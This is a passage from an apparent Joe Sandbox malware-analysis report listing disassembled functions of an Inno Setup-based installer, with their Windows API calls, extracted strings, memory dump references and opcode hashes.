                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ActiveForeground
                                                                                                                                                                      • String ID: Will not restart Windows automatically.
                                                                                                                                                                      • API String ID: 307657957-4169339592
                                                                                                                                                                      • Opcode ID: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                                                                                                                      • Instruction ID: 4958210349c6873c441c743532f51790e4d62edc104a08ffbd951144213b1fca
                                                                                                                                                                      • Opcode Fuzzy Hash: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                                                                                                                                      • Instruction Fuzzy Hash: 3541F130248240AED711FBA5EE96BBD7BE4EB55304F540CB7E8405B3A2D2FD68419B1D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042DBF8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue
                                                                                                                                                                      • String ID: 2H
                                                                                                                                                                      • API String ID: 3660427363-1900415311
                                                                                                                                                                      • Opcode ID: 2210028fe2807e69e92f4739ee3b830a5a3b1f57d5e2fb3c4c892f4317cfde7e
                                                                                                                                                                      • Instruction ID: 6f29e5db34dee79be2e4bdbc2feb63702d0df34b1de6f6cc3bdc936bcd48876b
                                                                                                                                                                      • Opcode Fuzzy Hash: 2210028fe2807e69e92f4739ee3b830a5a3b1f57d5e2fb3c4c892f4317cfde7e
                                                                                                                                                                      • Instruction Fuzzy Hash: 88414271E04529ABDB11DF95D881BAFB7B8EF05704FA18466E800F7241D778EE01CBA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046CA2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                                                                                                                                      • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                                                                      • API String ID: 0-1974262853
                                                                                                                                                                      • Opcode ID: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                                                                                                                      • Instruction ID: 55592184c39aac83035684310b8d0626f6b8fe487ab2a4e85d8be474453688ef
                                                                                                                                                                      • Opcode Fuzzy Hash: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 49318D30604208DFD711EB99D98ABAA77F5EB05704F5500BBF448AB3A2D7797E40CB4A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047892C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                                                                                                                                      Strings
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                                                                                                                                      • %s\%s_is1, xrefs: 004789A4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                      • API String ID: 47109696-1598650737
                                                                                                                                                                      • Opcode ID: f9da8ae1d4979ef289d6802097a5f1af1bada8b0d318eb095d2ff87398a7f130
                                                                                                                                                                      • Instruction ID: 1902e23b80ae68d1a407740dd401f48df33a1007776b0bbafa0d95379bb3c34b
                                                                                                                                                                      • Opcode Fuzzy Hash: f9da8ae1d4979ef289d6802097a5f1af1bada8b0d318eb095d2ff87398a7f130
                                                                                                                                                                      • Instruction Fuzzy Hash: AF216474B402449FDB01DBAACC556DEBBE8EB89704F91847FE408E7381DB789D018B59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004539F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                      • String ID: .tmp
                                                                                                                                                                      • API String ID: 1375471231-2986845003
                                                                                                                                                                      • Opcode ID: 92e42b72b921cc2367a900bc97e9b65bc1f28588fd0508973995d9b6ad4459be
                                                                                                                                                                      • Instruction ID: 5c47afe113f3b23246b8f03ea8338b9bfcdda488aecdb3892d8cb76e5c942ae9
                                                                                                                                                                      • Opcode Fuzzy Hash: 92e42b72b921cc2367a900bc97e9b65bc1f28588fd0508973995d9b6ad4459be
                                                                                                                                                                      • Instruction Fuzzy Hash: 4A213374A00218ABDB01EFA5C8529DFB7B9EF48305F50457BE801B7342DA7C9F059BA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045013C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501D1
                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00450202
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExecuteMessageSendShell
                                                                                                                                                                      • String ID: open
                                                                                                                                                                      • API String ID: 812272486-2758837156
                                                                                                                                                                      • Opcode ID: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                                                                                                                      • Instruction ID: 7e6871a26ddddf45a22869efb5a26db0f3e7f81d2927c2b78b58bd6f76e5dadf
                                                                                                                                                                      • Opcode Fuzzy Hash: d3a35c962c87995e6f353dcc7f0390f1f3aba8aca929dc82464802214bb86f4f
                                                                                                                                                                      • Instruction Fuzzy Hash: EE216274E00204AFDB04DFA5C889E9EB7F8EB44705F2085BAB814E7292D7789E44CA48
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00455264 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00455300
                                                                                                                                                                      • GetLastError.KERNEL32(0000003C,00000000,00455349,?,?,?), ref: 00455311
                                                                                                                                                                        • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                                                                                      • String ID: <
                                                                                                                                                                      • API String ID: 893404051-4251816714
                                                                                                                                                                      • Opcode ID: 4c896cd59535fb418932f18853aad30ce5e649d72a684272207557d66b115fbd
                                                                                                                                                                      • Instruction ID: ab6e9011ac2a47c3b5942fb44236b8cd8890e3b7caf9c3a2037be21c94c6989b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c896cd59535fb418932f18853aad30ce5e649d72a684272207557d66b115fbd
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F212370600609AFDB10EF65D8926EE7BE8AF48355F90403AFC44E7281D7789E45CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                                                                                        • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                                                        • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                                                        • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                                                        • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                      • String ID: )
                                                                                                                                                                      • API String ID: 2227675388-1084416617
                                                                                                                                                                      • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                                                                                      • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                                                                                      • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                                                                                      • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0049603A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496075
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window
                                                                                                                                                                      • String ID: /INITPROCWND=$%x $@
                                                                                                                                                                      • API String ID: 2353593579-4169826103
                                                                                                                                                                      • Opcode ID: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                                                                                                                      • Instruction ID: 17582354874f3a564912cfd2224966d9f48ebc88dda7ed38b5aba0a92b935dc2
                                                                                                                                                                      • Opcode Fuzzy Hash: ecbf6afcec96af61fcb478e5b0f8d10ed6ae26bf43725b19494f09826110d62b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1111B731A042448FDF01DBA4D892BAE7FE8EB48314F51447BE504E7282D73C9905CB5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0044740C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 004474BE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                                                                      • String ID: NIL Interface Exception$Unknown Method
                                                                                                                                                                      • API String ID: 3952431833-1023667238
                                                                                                                                                                      • Opcode ID: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                                                                                                                      • Instruction ID: e495528c603fed7e49a6c7636a2d67f8de45625ce5c80b81863372b855da2a7d
                                                                                                                                                                      • Opcode Fuzzy Hash: 456d6725a948a64f68b75857ecf673ecd15b77dd67b08c070dfb7a2d7b0a1602
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A11D670604208AFEB14DFA58952A6EBFBCEB08304F91447EF504E7282D7789D05CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004958AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000,0049594F), ref: 0049591A
                                                                                                                                                                      • CloseHandle.KERNEL32(004959B4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00495974,?,00495968,00000000), ref: 00495931
                                                                                                                                                                        • Part of subcall function 00495804: GetLastError.KERNEL32(00000000,0049589C,?,?,?,?), ref: 00495828
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                                                                      • String ID: <cI
                                                                                                                                                                      • API String ID: 3798668922-2480932022
                                                                                                                                                                      • Opcode ID: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                                                                                                                                      • Instruction ID: 6201355901f458c0f36557428e85d419ca31de49550c26c5d668688d9bb1e683
                                                                                                                                                                      • Opcode Fuzzy Hash: 34c6542742eff2dadab3d088a7a61d5c053afa182c64a6caa50429fa903ca566
                                                                                                                                                                      • Instruction Fuzzy Hash: 660161B1644648AFEF05DBA2DC42FAEBBACDF48714F61003BF504E7291D6785E05CA68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042DD5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD70
                                                                                                                                                                      • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$EnumQuery
                                                                                                                                                                      • String ID: Inno Setup: No Icons
                                                                                                                                                                      • API String ID: 1576479698-2016326496
                                                                                                                                                                      • Opcode ID: a4859c4430d413080fdac9de05bd006af788f08156e8d61986e08226eea053b7
                                                                                                                                                                      • Instruction ID: 0d60c2ceabc561baab214a4f8badfae1c51fae2703c03b7062d0178a0b9483fa
                                                                                                                                                                      • Opcode Fuzzy Hash: a4859c4430d413080fdac9de05bd006af788f08156e8d61986e08226eea053b7
                                                                                                                                                                      • Instruction Fuzzy Hash: C3012632B55B307AFB3085256C42F7B568CCF46B60F68003BF981EA2C1D6989C04936E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042ED30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                                                                                                                        • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                                                                                                                        • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                      • API String ID: 2552568031-1506664499
                                                                                                                                                                      • Opcode ID: fdf0572ad3393f9e2d141591a8876c62b6dddbf017611b2b215d45d15d345222
                                                                                                                                                                      • Instruction ID: abd39ea96fbc8e8598eec473428a27bf92d63543bd8a2491ee7d7de58c90140d
                                                                                                                                                                      • Opcode Fuzzy Hash: fdf0572ad3393f9e2d141591a8876c62b6dddbf017611b2b215d45d15d345222
                                                                                                                                                                      • Instruction Fuzzy Hash: B1117330B00319BFD711EB62ED85B8E7BA8EB55704F90407BF400A6691D778AE05865D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047BE88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                                                                                                      Download Yara Rule
